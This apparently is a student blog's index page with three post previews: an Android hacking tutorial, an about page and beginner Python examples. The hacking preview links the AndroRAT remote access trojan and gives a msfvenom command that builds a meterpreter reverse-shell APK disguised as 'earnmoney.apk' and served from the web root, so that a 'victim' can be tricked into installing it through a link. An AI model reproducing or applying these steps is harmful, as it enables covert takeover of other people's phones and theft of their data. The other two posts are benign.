Posts

Hacking android

Image
Hacking Android via AndroRat tool and make port forwarding  for clear explanation watch my youtube video hacking android phone AndroRat   follow the video for the clear explanation and here are the links i have been used port:  https://portmap.io   git hub link:  https://github.com/karma9874/AndroRAT mail:  https://temp-mail.org/en/ post2:-  Android Hacking with Metasploit Frame work In this post you be learning about how to hack a android mobile by sending a link to the victim firstly start you  kali  machine open  metasploit framework  once after opening the metasploit console type the following command  "here you will be creating the apk to hack the victim phone" so follow the commands "msfvenom -p android/meterpreter/reverse_tcp LHOST=0.0.0.0 LPORT=4444 R> /var/www/html/earnmoney.apk " *in place of 0.0.0.0 [enter you system ip address] *lport anything *-p is payload  make sure you execute the command with super us...

About the blog

About This Blog Welcome to BlackEye001 , a student–friendly programming & learning blog. This platform is created to help beginners, college students, and self-learners understand programming concepts easily, especially within the National Education Policy (NEP) based learning approach. Many students struggle to find structured explanations, examples, and real-world applications — so this blog aims to make learning simple and accessible. Here you will find: Programming tutorials & examples Logic building + DSA basics Simple explanations for college-level subjects Notes, guidance and reference materials Tips for projects, coding & problem-solving This blog exists purely for education and learning — to help students grow in technology with accessible knowledge and clear explanations. Stay tuned for more content and updates! Channel

Python Programming

Image
 Python Programming  Introduction to python programming Python is a high-level, interpreted programming language known for its simplicity and versatility. It is widely used in various fields, from web development to data science, machine learning, automation, and more. This introduction will cover the basics of Python programming, including its features, installation, and core concepts. Program 1: write  a python program to demonstrate basic data types in python (here we have many other data types) sol:                  print ( "----int----" ) print ( "possible integer values" ) print ( 15 ) print (- 25 ) print ( 0o 15 ) print ( 0x 12a ) x = 2 x = int ( 2 ) print ( x ) print ( int ( 25.5 )) print ( int ( "25" )) print ( "operations on integers" ) print ( "arithmetic operatons" ) print ( 2 ** 3 ) print ( 2 * 3 ) print ( 20 / 3 ) print ( 10 // 3 ) print ( 10 + 3 ) print ( 10 - 3 ) print ( "mathematical function" ) print ( pow ( ...